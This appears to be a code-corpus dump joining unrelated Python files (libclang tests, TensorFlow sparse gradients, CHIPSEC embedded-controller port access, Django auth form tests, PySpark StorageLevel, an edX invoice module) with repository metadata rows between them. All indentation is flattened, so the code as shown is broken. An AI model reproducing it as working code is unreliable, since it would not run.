assert fields[0].type.get_array_element_type() is not None
assert fields[0].type.get_array_element_type().kind == TypeKind.POINTER
assert fields[0].type.get_array_size() == 2
def test_equal():
"""Ensure equivalence operators work on Type."""
source = 'int a; int b; void *v;'
tu = get_tu(source)
a = get_cursor(tu, 'a')
b = get_cursor(tu, 'b')
v = get_cursor(tu, 'v')
assert a is not None
assert b is not None
assert v is not None
assert a.type == b.type
assert a.type != v.type
assert a.type != None
assert a.type != 'foo'
def test_typekind_spelling():
"""Ensure TypeKind.spelling works."""
tu = get_tu('int a;')
a = get_cursor(tu, 'a')
assert a is not None
assert a.type.kind.spelling == 'Int'
def test_function_argument_types():
"""Ensure that Type.argument_types() works as expected."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert args is not None
assert len(args) == 2
t0 = args[0]
assert t0 is not None
assert t0.kind == TypeKind.INT
t1 = args[1]
assert t1 is not None
assert t1.kind == TypeKind.INT
args2 = list(args)
assert len(args2) == 2
assert t0 == args2[0]
assert t1 == args2[1]
@raises(TypeError)
def test_argument_types_string_key():
"""Ensure that non-int keys raise a TypeError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert len(args) == 2
args['foo']
@raises(IndexError)
def test_argument_types_negative_index():
"""Ensure that negative indexes on argument_types Raises an IndexError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[-1]
@raises(IndexError)
def test_argument_types_overflow_index():
"""Ensure that indexes beyond the length of Type.argument_types() raise."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[2]
@raises(Exception)
def test_argument_types_invalid_type():
"""Ensure that obtaining argument_types on a Type without them raises."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.type.argument_types()
def test_is_pod():
"""Ensure Type.is_pod() works."""
tu = get_tu('int i; void f();')
i = get_cursor(tu, 'i')
f = get_cursor(tu, 'f')
assert i is not None
assert f is not None
assert i.type.is_pod()
assert not f.type.is_pod()
def test_function_variadic():
"""Ensure Type.is_function_variadic works."""
source ="""
#include <stdarg.h>
void foo(int a, ...);
void bar(int a, int b);
"""
tu = get_tu(source)
foo = get_cursor(tu, 'foo')
bar = get_cursor(tu, 'bar')
assert foo is not None
assert bar is not None
assert isinstance(foo.type.is_function_variadic(), bool)
assert foo.type.is_function_variadic()
assert not bar.type.is_function_variadic()
def test_element_type():
"""Ensure Type.element_type works."""
tu = get_tu('int i[5];')
i = get_cursor(tu, 'i')
assert i is not None
assert i.type.kind == TypeKind.CONSTANTARRAY
assert i.type.element_type.kind == TypeKind.INT
@raises(Exception)
def test_invalid_element_type():
"""Ensure Type.element_type raises if type doesn't have elements."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.element_type
def test_element_count():
"""Ensure Type.element_count works."""
tu = get_tu('int i[5]; int j;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert i.type.element_count == 5
try:
j.type.element_count
assert False
except:
assert True
def test_is_volatile_qualified():
"""Ensure Type.is_volatile_qualified works."""
tu = get_tu('volatile int i = 4; int j = 2;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_volatile_qualified(), bool)
assert i.type.is_volatile_qualified()
assert not j.type.is_volatile_qualified()
def test_is_restrict_qualified():
"""Ensure Type.is_restrict_qualified works."""
tu = get_tu('struct s { void * restrict i; void * j };')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_restrict_qualified(), bool)
assert i.type.is_restrict_qualified()
assert not j.type.is_restrict_qualified()
| bsd-2-clause | -3,257,201,517,061,547,000 | 26.148551 | 88 | 0.637528 | false |
a-doumoulakis/tensorflow | tensorflow/python/ops/sparse_grad.py | 61 | 10799 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in sparse_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable("SparseAddGrad")
ops.NotDifferentiable("SparseConcat")
ops.NotDifferentiable("SparseToDense")
@ops.RegisterGradient("SparseReorder")
def _SparseReorderGrad(op, unused_output_indices_grad, output_values_grad):
"""Gradients for the SparseReorder op.
Args:
op: the SparseReorder op
unused_output_indices_grad: the incoming gradients of the output indices
output_values_grad: the incoming gradients of the output values
Returns:
Gradient for each of the 3 input tensors:
(input_indices, input_values, input_shape)
The gradients for input_indices and input_shape is None.
"""
input_indices = op.inputs[0]
input_shape = op.inputs[2]
num_entries = array_ops.shape(input_indices)[0]
entry_indices = math_ops.range(num_entries)
sp_unordered = sparse_tensor.SparseTensor(
input_indices, entry_indices, input_shape)
sp_ordered = sparse_ops.sparse_reorder(sp_unordered)
inverted_permutation = array_ops.invert_permutation(sp_ordered.values)
return (None,
array_ops.gather(output_values_grad, inverted_permutation),
None)
@ops.RegisterGradient("SparseAdd")
def _SparseAddGrad(op, *grads):
"""The backward operator for the SparseAdd op.
The SparseAdd op calculates A + B, where A, B, and the sum are all represented
as `SparseTensor` objects. This op takes in the upstream gradient w.r.t.
non-empty values of the sum, and outputs the gradients w.r.t. the non-empty
values of A and B.
Args:
op: the SparseAdd op
*grads: the incoming gradients, one element per output of `op`
Returns:
Gradient for each of the 6 input tensors of SparseAdd:
(a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
The gradients for the indices, shapes, and the threshold are None.
"""
val_grad = grads[1]
a_indices = op.inputs[0]
b_indices = op.inputs[3]
sum_indices = op.outputs[0]
# NOTE: we do not need to take `thresh` into account, since it simply affects
# the non-zero elements of the sum, and we will peek into `sum_indices` in the
# gradient op.
# pylint: disable=protected-access
a_val_grad, b_val_grad = gen_sparse_ops._sparse_add_grad(val_grad, a_indices,
b_indices,
sum_indices)
a_val_grad.set_shape(op.inputs[1].get_shape())
b_val_grad.set_shape(op.inputs[4].get_shape())
# (a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
return (None, a_val_grad, None, None, b_val_grad, None, None)
@ops.RegisterGradient("SparseTensorDenseAdd")
def _SparseTensorDenseAddGrad(op, out_grad):
sp_indices = op.inputs[0]
# (sparse_indices, sparse_values, sparse_shape, dense)
return (None, array_ops.gather_nd(out_grad, sp_indices), None, out_grad)
@ops.RegisterGradient("SparseReduceSum")
def _SparseReduceSumGrad(op, out_grad):
"""Similar to gradient for the Sum Op (i.e. tf.reduce_sum())."""
sp_indices = op.inputs[0]
sp_shape = op.inputs[2]
output_shape_kept_dims = math_ops.reduced_shape(sp_shape, op.inputs[3])
out_grad_reshaped = array_ops.reshape(out_grad, output_shape_kept_dims)
scale = sp_shape // math_ops.to_int64(output_shape_kept_dims)
# (sparse_indices, sparse_values, sparse_shape, reduction_axes)
return (None, array_ops.gather_nd(out_grad_reshaped, sp_indices // scale),
None, None)
@ops.RegisterGradient("SparseTensorDenseMatMul")
def _SparseTensorDenseMatMulGrad(op, grad):
"""Gradients for the dense tensor in the SparseTensorDenseMatMul op.
If either input is complex, no gradient is provided.
Args:
op: the SparseTensorDenseMatMul op
grad: the incoming gradient
Returns:
Gradient for each of the 4 input tensors:
(sparse_indices, sparse_values, sparse_shape, dense_tensor)
The gradients for indices and shape are None.
Raises:
TypeError: When the two operands don't have the same type.
"""
a_indices, a_values, a_shape = op.inputs[:3]
b = op.inputs[3]
adj_a = op.get_attr("adjoint_a")
adj_b = op.get_attr("adjoint_b")
a_type = a_values.dtype.base_dtype
b_type = b.dtype.base_dtype
if a_type != b_type:
raise TypeError("SparseTensorDenseMatMul op received operands with "
"different types: ", a_type, " and ", b_type)
if a_type in (ops.dtypes.complex64, ops.dtypes.complex128):
raise NotImplementedError("SparseTensorDenseMatMul op does not support "
"complex gradients.")
# gradient w.r.t. dense
b_grad = gen_sparse_ops._sparse_tensor_dense_mat_mul( # pylint: disable=protected-access
a_indices, a_values, a_shape, grad, adjoint_a=not adj_a)
if adj_b:
b_grad = array_ops.transpose(b_grad)
# gradient w.r.t. sparse values
rows = a_indices[:, 0]
cols = a_indices[:, 1]
# TODO(zongheng, ebrevdo): add conjugates in the right places when complex
# values are allowed.
# TODO(zongheng): these gather calls could potentially duplicate rows/cols in
# memory. If there is a need, we should look into implementing this more
# intelligently to avoid duplicating data.
parts_a = array_ops.gather(grad, rows if not adj_a else cols)
parts_b = array_ops.gather(b if not adj_b else array_ops.transpose(b),
cols if not adj_a else rows)
a_values_grad = math_ops.reduce_sum(parts_a * parts_b, reduction_indices=1)
# gradients w.r.t. (a_indices, a_values, a_shape, b)
return (None, a_values_grad, None, b_grad)
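# Sanity note (added for clarity, not part of the original file): in the non-adjoint
# case with C = A @ B (A sparse, B dense), the code above computes dL/dB = A^T @ dL/dC,
# and for each stored entry a[r, c] it computes
# dL/da[r, c] = sum_k dL/dC[r, k] * B[c, k], which is what the gather/reduce_sum pair does.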
@ops.RegisterGradient("SparseDenseCwiseAdd")
def _SparseDenseCwiseAddGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseDenseCwiseAdd is currently not"
" implemented yet.")
def _SparseDenseCwiseMulOrDivGrad(op, grad, is_mul):
"""Common code for SparseDenseCwise{Mul,Div} gradients."""
x_indices = op.inputs[0]
x_shape = op.inputs[2]
y = op.inputs[3]
y_shape = math_ops.to_int64(array_ops.shape(y))
num_added_dims = array_ops.expand_dims(
array_ops.size(x_shape) - array_ops.size(y_shape), 0)
augmented_y_shape = array_ops.concat(
[array_ops.ones(num_added_dims, ops.dtypes.int64), y_shape], 0)
scaling = x_shape // augmented_y_shape
scaled_indices = x_indices // scaling
scaled_indices = array_ops.slice(scaled_indices,
array_ops.concat([[0], num_added_dims], 0),
[-1, -1])
dense_vals = array_ops.gather_nd(y, scaled_indices)
if is_mul:
dx = grad * dense_vals
dy_val = grad * op.inputs[1]
else:
dx = grad / dense_vals
dy_val = grad * (-op.inputs[1] / math_ops.square(dense_vals))
# indices can repeat after scaling, so we can't use sparse_to_dense().
dy = sparse_ops.sparse_add(
array_ops.zeros_like(y),
sparse_tensor.SparseTensor(scaled_indices, dy_val, y_shape))
# (sp_indices, sp_vals, sp_shape, dense)
return (None, dx, None, dy)
@ops.RegisterGradient("SparseDenseCwiseMul")
def _SparseDenseCwiseMulGrad(op, grad):
"""Gradients for SparseDenseCwiseMul."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, True)
@ops.RegisterGradient("SparseDenseCwiseDiv")
def _SparseDenseCwiseDivGrad(op, grad):
"""Gradients for SparseDenseCwiseDiv."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, False)
@ops.RegisterGradient("SparseSoftmax")
def _SparseSoftmaxGrad(op, grad):
"""Gradients for SparseSoftmax.
The calculation is the same as SoftmaxGrad:
grad_x = grad_softmax * softmax - sum(grad_softmax * softmax) * softmax
where we now only operate on the non-zero values present in the SparseTensors.
Args:
op: the SparseSoftmax op.
grad: the upstream gradient w.r.t. the non-zero SparseSoftmax output values.
Returns:
Gradients w.r.t. the input (sp_indices, sp_values, sp_shape).
"""
indices, shape = op.inputs[0], op.inputs[2]
out_vals = op.outputs[0]
sp_output = sparse_tensor.SparseTensor(indices, out_vals, shape)
sp_grad = sparse_tensor.SparseTensor(indices, grad, shape)
sp_product = sparse_tensor.SparseTensor(
indices, sp_output.values * sp_grad.values, shape)
# [..., B, 1], dense.
sum_reduced = -sparse_ops.sparse_reduce_sum(sp_product, [-1], keep_dims=True)
# sparse [..., B, C] + dense [..., B, 1] with broadcast; outputs sparse.
sp_sum = sparse_ops.sparse_dense_cwise_add(sp_grad, sum_reduced)
grad_x = sp_sum.values * sp_output.values
return [None, grad_x, None]
@ops.RegisterGradient("SparseSparseMaximum")
def _SparseSparseMaximumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMaximum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseSparseMinimum")
def _SparseSparseMinimumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMinimum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseFillEmptyRows")
def _SparseFillEmptyRowsGrad(op, unused_grad_output_indices, output_grad_values,
unused_grad_empty_row_indicator,
unused_grad_reverse_index_map):
"""Gradients for SparseFillEmptyRows."""
reverse_index_map = op.outputs[3]
# pylint: disable=protected-access
d_values, d_default_value = gen_sparse_ops._sparse_fill_empty_rows_grad(
reverse_index_map=reverse_index_map, grad_values=output_grad_values)
# d_indices, d_values, d_dense_shape, d_default_value.
return [None, d_values, None, d_default_value]
| apache-2.0 | -5,210,230,369,046,255,000 | 36.758741 | 91 | 0.687841 | false |
chipsecintel/chipsec | source/tool/chipsec/hal/ec.py | 3 | 6172 | #!/usr/local/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2016, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------
"""
Access to Embedded Controller (EC)
Usage:
>>> write_command( command )
>>> write_data( data )
>>> read_data()
>>> read_memory( offset )
>>> write_memory( offset, data )
>>> read_memory_extended( word_offset )
>>> write_memory_extended( word_offset, data )
>>> read_range( start_offset, size )
>>> write_range( start_offset, buffer )
"""
from chipsec.logger import *
from chipsec.cfg.common import *
#
# Embedded Controller ACPI ports
#
IO_PORT_EC_DATA = 0x62
IO_PORT_EC_COMMAND = 0x66
IO_PORT_EC_STATUS = 0x66
IO_PORT_EC_INDEX = 0x380
IO_PORT_EC_INDEX_ADDRH = (IO_PORT_EC_INDEX + 0x1)
IO_PORT_EC_INDEX_ADDRL = (IO_PORT_EC_INDEX + 0x2)
IO_PORT_EC_INDEX_DATA = (IO_PORT_EC_INDEX + 0x3)
EC_STS_OBF = 0x01 # EC Output buffer full
EC_STS_IBF = 0x02 # EC Input buffer full
#
# Embedded Controller ACPI commands
# These commands should be submitted to EC ACPI I/O ports
#
EC_COMMAND_ACPI_READ = 0x080 # Read EC ACPI memory
EC_COMMAND_ACPI_WRITE = 0x081 # Write EC ACPI memory
EC_COMMAND_ACPI_LOCK = 0x082 # Lock EC for burst use
EC_COMMAND_ACPI_UNLOCK = 0x083 # Unlock EC from burst use
EC_COMMAND_ACPI_QUERY = 0x084 # Query EC event
EC_COMMAND_ACPI_READ_EXT = 0x0F0 # Read EC ACPI extended memory
EC_COMMAND_ACPI_WRITE_EXT = 0x0F1 # Write EC ACPI extended memory
class EC:
def __init__( self, cs ):
self.cs = cs
#
# EC ACPI memory access
#
# Wait for EC input buffer empty
def _wait_ec_inbuf_empty( self ):
to = 1000
while (self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_IBF) and to: to = to - 1
return True
# Wait for EC output buffer full
def _wait_ec_outbuf_full( self ):
to = 1000
while not ( self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_OBF ) and to: to = to - 1
return True
def write_command( self, command ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_COMMAND, command )
def write_data( self, data ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_DATA, data )
def read_data( self ):
if not self._wait_ec_outbuf_full(): return None
return self.cs.io.read_port_byte( IO_PORT_EC_DATA )
def read_memory( self, offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( offset )
return self.read_data()
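    # Illustrative sequence (added comment, not in the original file): reading ACPI
    # offset 0x10 writes command 0x80 to port 0x66, then 0x10 to port 0x62, and reads
    # the result byte back from port 0x62, waiting on the IBF/OBF status bits in between.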
def write_memory( self, offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( offset )
return self.write_data( data )
def read_memory_extended( self, word_offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_READ_EXT )
self.write_data( word_offset >> 8 )
return self.read_data()
def write_memory_extended( self, word_offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_WRITE_EXT )
self.write_data( word_offset >> 8 )
return self.write_data( data )
def read_range( self, start_offset, size ):
buffer = [chr(0xFF)]*size
#self.write_command( EC_COMMAND_ACPI_READ )
for i in range (size):
#self.write_data( start_offset + i )
#buffer[i] = chr( self.read_data() )
if start_offset + i < 0x100:
buffer[i] = chr( self.read_memory( start_offset + i ) )
else:
buffer[i] = chr( self.read_memory_extended( start_offset + i ) )
if logger().VERBOSE:
logger().log( "[ec] read EC memory from offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return buffer
def write_range( self, start_offset, buffer ):
size = len(buffer)
for i in range(size):
self.write_memory( start_offset + i, ord(buffer[i]) )
if logger().VERBOSE:
logger().log( "[ec] write EC memory to offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return True
#
    # EC Index I/O access
#
def read_idx( self, offset ):
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
value = self.cs.io.read_port_byte( IO_PORT_EC_INDEX_DATA )
if logger().HAL: logger().log( "[ec] index read: offset 0x%02X > 0x%02X:" % (offset, value) )
return value
def write_idx( self, offset, value ):
if logger().HAL: logger().log( "[ec] index write: offset 0x%02X < 0x%02X:" % (offset, value) )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_DATA, value & 0xFF )
return True
| gpl-2.0 | 2,814,664,325,244,914,700 | 33.674157 | 102 | 0.606124 | false |
pwhelan/djshouts | django/contrib/auth/tests/forms.py | 97 | 9436 | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm, PasswordChangeForm, SetPasswordForm, UserChangeForm, PasswordResetForm
from django.db import connection
from django.test import TestCase
from django.utils import unittest
class UserCreationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'A user with that username already exists.'])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[u"The two password fields didn't match."])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
self.assertEqual(form['password2'].errors,
[u'This field is required.'])
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
def test_success(self):
# The success case.
data = {
'username': '[email protected]',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
u = form.save()
self.assertEqual(repr(u), '<User: [email protected]>')
class AuthenticationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'Please enter a correct username and password. Note that both fields are case-sensitive.'])
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'This account is inactive.'])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
class SetPasswordFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
class PasswordChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors,
[u'Your old password was entered incorrectly. Please enter it again.'])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(PasswordChangeForm(user, {}).fields.keys(),
['old_password', 'new_password1', 'new_password2'])
class UserChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
@unittest.skipIf(not connection.features.supports_joins, 'Requires JOIN support')
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
self.assertEqual(form['username'].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_bug_14242(self):
        # A regression test, introduced by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super(MyUserForm, self).__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
form = MyUserForm({})
class PasswordResetFormTest(TestCase):
fixtures = ['authtestdata.json']
def create_dummy_user(self):
"""creates a user and returns a tuple
(user_object, username, email)
"""
username = 'jsmith'
email = '[email protected]'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email':'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors,
[u'Enter a valid e-mail address.'])
def test_nonexistant_email(self):
# Test nonexistant email address
data = {'email':'[email protected]'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors,
{'email': [u"That e-mail address doesn't have an associated user account. Are you sure you've registered?"]})
def test_cleaned_data(self):
# Regression test
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['email'], email)
def test_bug_5605(self):
# bug #5605, preserve the case of the user name (before the @ in the
# email address) when creating a user.
user = User.objects.create_user('forms_test2', '[email protected]', 'test')
self.assertEqual(user.email, '[email protected]')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
        # Tests that an inactive user cannot
        # receive a password reset email.
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertFalse(form.is_valid())
| bsd-3-clause | -7,808,169,824,084,575,000 | 33.564103 | 147 | 0.577999 | false |
ConeyLiu/spark | python/pyspark/storagelevel.py | 32 | 2640 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__all__ = ["StorageLevel"]
class StorageLevel(object):
"""
Flags for controlling the storage of an RDD. Each StorageLevel records whether to use memory,
whether to drop the RDD to disk if it falls out of memory, whether to keep the data in memory
in a JAVA-specific serialized format, and whether to replicate the RDD partitions on multiple
    nodes. Also contains static constants for some commonly used storage levels, such as MEMORY_ONLY.
Since the data is always serialized on the Python side, all the constants use the serialized
formats.
"""
def __init__(self, useDisk, useMemory, useOffHeap, deserialized, replication=1):
self.useDisk = useDisk
self.useMemory = useMemory
self.useOffHeap = useOffHeap
self.deserialized = deserialized
self.replication = replication
def __repr__(self):
return "StorageLevel(%s, %s, %s, %s, %s)" % (
self.useDisk, self.useMemory, self.useOffHeap, self.deserialized, self.replication)
def __str__(self):
result = ""
result += "Disk " if self.useDisk else ""
result += "Memory " if self.useMemory else ""
result += "OffHeap " if self.useOffHeap else ""
result += "Deserialized " if self.deserialized else "Serialized "
result += "%sx Replicated" % self.replication
return result
StorageLevel.DISK_ONLY = StorageLevel(True, False, False, False)
StorageLevel.DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
StorageLevel.MEMORY_ONLY = StorageLevel(False, True, False, False)
StorageLevel.MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
StorageLevel.MEMORY_AND_DISK = StorageLevel(True, True, False, False)
StorageLevel.MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
StorageLevel.OFF_HEAP = StorageLevel(True, True, True, False, 1)
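# Illustrative usage (added comment, not part of the original module): a caller would
# typically pass one of the predefined constants when persisting an RDD, e.g.
#   rdd.persist(StorageLevel.MEMORY_AND_DISK_2)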
| apache-2.0 | -6,569,527,250,402,767,000 | 44.517241 | 97 | 0.714773 | false |
angelapper/edx-platform | lms/djangoapps/shoppingcart/pdf.py | 22 | 18645 | """
Template for PDF Receipt/Invoice Generation
"""
import logging
from django.conf import settings
from django.utils.translation import ugettext as _
from PIL import Image
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import mm
from reportlab.pdfgen.canvas import Canvas
from reportlab.platypus import Paragraph
from reportlab.platypus.tables import Table, TableStyle
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from xmodule.modulestore.django import ModuleI18nService
log = logging.getLogger("PDF Generation")
class NumberedCanvas(Canvas):
"""
Canvas child class with auto page-numbering.
"""
def __init__(self, *args, **kwargs):
"""
__init__
"""
Canvas.__init__(self, *args, **kwargs)
self._saved_page_states = []
def insert_page_break(self):
"""
Starts a new page.
"""
self._saved_page_states.append(dict(self.__dict__))
self._startPage()
def current_page_count(self):
"""
Returns the page count in the current pdf document.
"""
return len(self._saved_page_states) + 1
def save(self):
"""
Adds page numbering to each page (page x of y)
"""
num_pages = len(self._saved_page_states)
for state in self._saved_page_states:
self.__dict__.update(state)
if num_pages > 1:
self.draw_page_number(num_pages)
Canvas.showPage(self)
Canvas.save(self)
def draw_page_number(self, page_count):
"""
Draws the String "Page x of y" at the bottom right of the document.
"""
self.setFontSize(7)
self.drawRightString(
200 * mm,
12 * mm,
_("Page {page_number} of {page_count}").format(page_number=self._pageNumber, page_count=page_count)
)
class PDFInvoice(object):
"""
PDF Generation Class
"""
def __init__(self, items_data, item_id, date, is_invoice, total_cost, payment_received, balance):
"""
Accepts the following positional arguments
        items_data - A list of dicts, one per row, each with the following keys:
item_description - String
quantity - Integer
list_price - float
discount - float
item_total - float
        item_id - String
date - datetime
is_invoice - boolean - True (for invoice) or False (for Receipt)
total_cost - float
payment_received - float
balance - float
"""
# From settings
self.currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
self.logo_path = configuration_helpers.get_value("PDF_RECEIPT_LOGO_PATH", settings.PDF_RECEIPT_LOGO_PATH)
self.cobrand_logo_path = configuration_helpers.get_value(
